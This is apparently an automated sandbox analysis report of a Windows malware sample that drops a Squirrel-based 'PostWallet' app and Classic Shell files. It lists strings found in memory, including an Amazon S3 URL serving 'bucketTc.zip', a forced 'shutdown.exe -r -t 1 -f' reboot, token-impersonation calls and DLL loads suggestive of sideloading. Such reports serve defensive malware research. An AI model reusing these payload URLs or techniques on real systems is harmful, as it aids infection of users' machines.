          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/Main1.dll
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/vcruntime140.dll
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/vmwarebase.dll
          Source: Update.exe, 00000003.00000002.2060372901.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/package/services/metadata/core-properties/0efccca87b4345efa345d5a58c8332f0.p
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.bsdiff
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.diff
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.dll
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.exe
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.nuspec
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.psmdcp
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.rels
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.shasum
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, ClassicStartMenuDLL.dll.13.dr, FilePost?a.exe.3.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp.digicert.com0L
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: http://ocsp.digicert.com0N
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
          Source: Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformats.or
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drString found in binary or memory: http://www.classicshell.net
          Source: ClassicExplorer32.dll.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drString found in binary or memory: http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html
          Source: ClassicStartMenuDLL.dll.13.drString found in binary or memory: http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html=~
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.net/
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.net/faq/
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drString found in binary or memory: http://www.classicshell.net/files/updates/update_PA
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.net/forum/viewforum.php
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.net/forum/viewforum.php?f=11
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.net/forum/viewforum.php?f=6
          Source: ClassicShellUpdate.exe.13.drString found in binary or memory: http://www.classicshell.netRemindedLangVersionRemindedVersionSoftware
          Source: rundll32.exe, rundll32.exe, 0000000D.00000002.3856964343.0000000000428000.00000020.00000001.01000000.0000000D.sdmp, Main.dll.8.dr, ClassicIE_64.dll.13.drString found in binary or memory: http://www.delphiforfun.org/
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://www.vmware.com/0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://www.vmware.com/0/
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drString found in binary or memory: http://www.yoursite.com
          Source: Update.exeString found in binary or memory: https://api.github.com/#
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/R
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3859934007.000001D5874DF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip=
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipM
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipx
          Source: Update.exeString found in binary or memory: https://github.com/myuser/myrepo
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, ClassicStartMenuDLL.dll.13.dr, FilePost?a.exe.3.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownHTTPS traffic detected: 3.5.232.137:443 -> 192.168.2.5:49705 version: TLS 1.2

          System Summary

          barindex
          Uses shutdown.exe to shutdown or reboot the system
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED6EA0 memset,EnterCriticalSection,EnterCriticalSection,memcpy,LeaveCriticalSection,GetTokenInformation,GetLastError,Warning,GetTokenInformation,EqualSid,LeaveCriticalSection,Warning,Warning,free,free,DuplicateTokenEx,GetLastError,free,free,AllocateAndInitializeSid,GetLastError,Warning,SetTokenInformation,GetLastError,Warning,FreeSid,free,free,Warning,GetLastError,free,ImpersonateLoggedOnUser,GetLastError,Warning,GetLastError,free,_stricmp,free,free,Warning,Warning,CreateProcessAsUserW,free,free,GlobalMemoryStatusEx,GetLastError,free,free,SetProcessWorkingSetSize,GetLastError,ResumeThread,CloseHandle,free,free,GetLastError,GetCurrentProcess,IsWow64Process,GetTokenInformation,GetLastError,Warning,free,free,Warning,Warning,free,free,free,free,free,free,Warning,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,4_2_00ED6EA0
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F3B1893_2_00007FF848F3B189
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F30F183_2_00007FF848F30F18
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F30F253_2_00007FF848F30F25
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F5314D3_2_00007FF848F5314D
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F541B03_2_00007FF848F541B0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED5C704_2_00ED5C70
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED4D004_2_00ED4D00
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF63CE04_2_6CF63CE0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF7CC4C4_2_6CF7CC4C
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF86D0F4_2_6CF86D0F
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF89FC04_2_6CF89FC0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF75F804_2_6CF75F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF709804_2_6CF70980
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF6EAE04_2_6CF6EAE0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF75A804_2_6CF75A80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF62BD04_2_6CF62BD0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF924894_2_6CF92489
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF7E5E54_2_6CF7E5E5
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF5F5604_2_6CF5F560
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF8550B4_2_6CF8550B
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF756604_2_6CF75660
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF6F7604_2_6CF6F760
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF6F0F04_2_6CF6F0F0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF962364_2_6CF96236
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF882224_2_6CF88222
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF9A21D4_2_6CF9A21D
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF6E3504_2_6CF6E350
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF9A33D4_2_6CF9A33D
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF6F3144_2_6CF6F314
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6E39A6F84_2_6E39A6F8
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6E398D5F4_2_6E398D5F
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6E3933204_2_6E393320
          Source: C:\Windows\System32\rundll32.exeCode function: 13_2_00414B5013_2_00414B50
          Source: C:\Windows\System32\rundll32.exeCode function: 13_2_0043822013_2_00438220
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 00ED3B70 appears 41 times
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 00ED27C0 appears 89 times
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 00ED93B4 appears 49 times
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: String function: 6CF78690 appears 58 times
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: Resource name: DATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: Windows Aero.skin.13.drStatic PE information: No import functions for PE file found
          Source: Metro.skin7.13.drStatic PE information: No import functions for PE file found
          Source: Midnight.skin7.13.drStatic PE information: No import functions for PE file found
          Source: Classic Skin.skin7.13.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll.13.drStatic PE information: No import functions for PE file found
          Source: Windows XP Luna.skin.13.drStatic PE information: No import functions for PE file found
          Source: Metallic.skin7.13.drStatic PE information: No import functions for PE file found
          Source: Full Glass.skin.13.drStatic PE information: No import functions for PE file found
          Source: Smoked Glass.skin.13.drStatic PE information: No import functions for PE file found
          Source: Windows Aero.skin7.13.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.13.drStatic PE information: No import functions for PE file found
          Source: Windows Basic.skin.13.drStatic PE information: No import functions for PE file found
          Source: Classic Skin.skin.13.drStatic PE information: No import functions for PE file found
          Source: Metro.skin.13.drStatic PE information: No import functions for PE file found
          Source: Windows 8.skin.13.drStatic PE information: No import functions for PE file found
          Source: Windows 8.skin7.13.drStatic PE information: No import functions for PE file found
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.2012350577.0000000001355000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.2012430471.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.2012350577.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exe, 00000001.00000003.2012404028.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: 00023948209303294#U00ac320302282349843984903.exeBinary or memory string: OriginalFilenameSetup.exe6 vs 00023948209303294#U00ac320302282349843984903.exe
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: msvcp140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d9.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: msctfui.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: vmwarebase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeSection loaded: wldp.dllJump to behavior
